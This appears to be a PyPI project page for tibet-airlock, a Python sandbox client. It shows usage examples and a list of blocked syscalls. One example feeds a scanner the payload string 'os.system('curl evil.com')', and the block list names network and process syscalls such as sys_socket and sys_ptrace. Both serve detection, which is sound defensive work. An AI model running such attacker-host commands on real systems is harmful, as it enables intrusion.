Zero-trust sandbox with TIBET provenance — kernel isolation in <1ms, cryptographic proof of every execution
Project description
tibet-airlock
Zero-trust sandbox with TIBET provenance. Kernel isolation in <1ms, cryptographic proof of every execution.
Python client + SNAFT bindings for the tibet-airlock Rust binary.
Install
pip install tibet-airlock
Or as part of the TIBET security bundle:
pip install tibet[security]
Use with Airlock binary (full isolation)
# Terminal 1: start the airlock
cargo install tibet-airlock
tibet-airlock
# Terminal 2: Python
from tibet_airlock import Airlock
result = Airlock.run("code:execute", "print('hello world')")
print(result.status) # 200
print(result.safe) # True
print(result.roundtrip_ms) # 0.6
print(result.token) # TIBET provenance token
Use SNAFT directly (no binary needed)
from tibet_airlock import SnaftMonitor
# Monitor syscalls for an intent
monitor = SnaftMonitor("code:execute")
monitor.log_syscall("sys_write") # OK
monitor.log_syscall("sys_socket") # VIOLATION - network access!
decision = monitor.triage()
print(decision.is_safe) # False
print(decision.violations) # ['sys_socket (blocked: dangerous syscall for any intent)']
# Or scan a payload string
monitor = SnaftMonitor("code:execute")
detected = monitor.scan_payload("import os; os.system('curl evil.com')")
decision = monitor.triage()
print(decision.is_kill) # True
How it works
Intent -> Snapshot Wake (<0.01ms) -> SNAFT Monitor -> Triage -> TIBET Token
- Intent routing — each intent maps to a pre-warmed microVM snapshot
- SNAFT monitoring — every syscall checked against intent-specific allowlist
- Triage — violations = instant kill, clean = graceful shutdown
- TIBET token — cryptographic proof of what happened (the 4 dimensions: erin, eraan, eromheen, erachter)
Blocked syscalls (always dangerous)
sys_ptrace, sys_socket, sys_connect, sys_dlopen, sys_fork, sys_clone, sys_mount, sys_reboot, sys_kexec_load
Part of TIBET
- Rust binary: crates.io/crates/tibet-airlock
- Full ecosystem:
pip install tibet[full](28 packages) - Website: ainternet.org
Built by Humotica for the AInternet.
Enterprise
For private hub hosting, SLA support, custom integrations, or compliance guidance:
| Enterprise | enterprise@humotica.com |
| Support | support@humotica.com |
| Security | security@humotica.com |
See ENTERPRISE.md for details.
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file tibet_airlock-0.2.0.tar.gz.
File metadata
- Download URL: tibet_airlock-0.2.0.tar.gz
- Upload date:
- Size: 11.0 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.5
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
1960a3d86c874b6a1147cf4b7660159a2319377a6d952702c8603885536ac1a1
|
|
| MD5 |
2f30452b52ee54f1725bf3f8ec2a2acb
|
|
| BLAKE2b-256 |
3c44802429a26caff985d7a90d6ff8fedc1ac05fbd753946d64a2a1d8bb04c9c
|
File details
Details for the file tibet_airlock-0.2.0-py3-none-any.whl.
File metadata
- Download URL: tibet_airlock-0.2.0-py3-none-any.whl
- Upload date:
- Size: 8.7 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.5
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
a3d7771e77317cfa1965b51bfbf46b0bf864321dbd6b269c5f7126d2800034fc
|
|
| MD5 |
8e6ae66523d1d13f22b8431f9658d97e
|
|
| BLAKE2b-256 |
9a3250b0ba41a00385bb9518d0a6f26845abd9bb7d62f70bec23d1948818cfad
|